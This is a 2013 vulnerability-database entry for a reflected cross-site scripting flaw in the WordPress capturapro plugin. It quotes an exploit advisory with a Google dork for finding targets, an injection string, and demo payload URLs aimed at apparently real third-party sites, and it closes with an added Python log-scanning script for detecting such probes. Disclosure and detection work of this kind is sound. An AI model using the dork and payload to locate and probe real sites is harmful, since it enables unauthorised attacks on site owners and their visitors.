WordPress capturapro Plugin Cross-Site Scripting

Vulnerability ID: 1044107
Vulnerability type:
Published: 2013-11-22
Updated: 2013-11-22
CVE ID: N/A
CNNVD-ID: N/A
Platform: N/A
CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2013110159
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit
#######################################################################
# Exploit Title : Wordpress capturapro Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/capturapro
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/11/22
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/capturapro/lp/index.php?id=[xss]
#
#
# Script For Test : "/><script>alert(1);</script>
#
##########################################
# Demo
http://mensajesublXiminalextremo.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

http://marinaybarXenlared.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

http://formulatuXexito.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

http://wpalenciXa.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

##############

Milad Hacking

We Love Mohammad

##############
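
Added example, not part of the original advisory: a log check a site owner can run to find requests to the plugin page named above whose `id` value is anything other than a plain token, which catches the reflected-XSS probe regardless of how the markup is encoded. The combined access-log format, the allowlist for legitimate `id` values, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Path and parameter named in the advisory above.
VULN_PATH = "/wp-content/plugins/capturapro/lp/index.php"
PARAM = "id"
# Assumption: legitimate id values are short alphanumeric tokens.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,32}")
# Assumption: Apache/nginx "combined" access-log format.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Nov/2013:10:00:01 +0000] "GET /wp-content/plugins/capturapro/lp/index.php?id=17 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Nov/2013:10:02:13 +0000] "GET /wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 5200',
    '192.0.2.10 - - [22/Nov/2013:10:03:40 +0000] "GET /wp-login.php?id=%3Cb%3E HTTP/1.1" 200 2048',
]

def param_values(query, name):
    """Yield percent-decoded values of one query parameter."""
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) == name:
            yield unquote_plus(raw)

def suspicious_requests(lines):
    """Return (client_ip, status, decoded_id) for plugin hits with a non-token id."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip, target, status = m.groups()
        url = urlsplit(target)
        # endswith() also matches WordPress installed in a subdirectory.
        if not unquote(url.path).lower().endswith(VULN_PATH):
            continue
        for value in param_values(url.query, PARAM):
            if not SAFE_ID.fullmatch(value):
                hits.append((ip, int(status), value))
    return hits

if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

A hit with status 200 means the page served the request, so the response for that URL is worth checking for the reflected value; removing or updating the plugin closes the exposure either way.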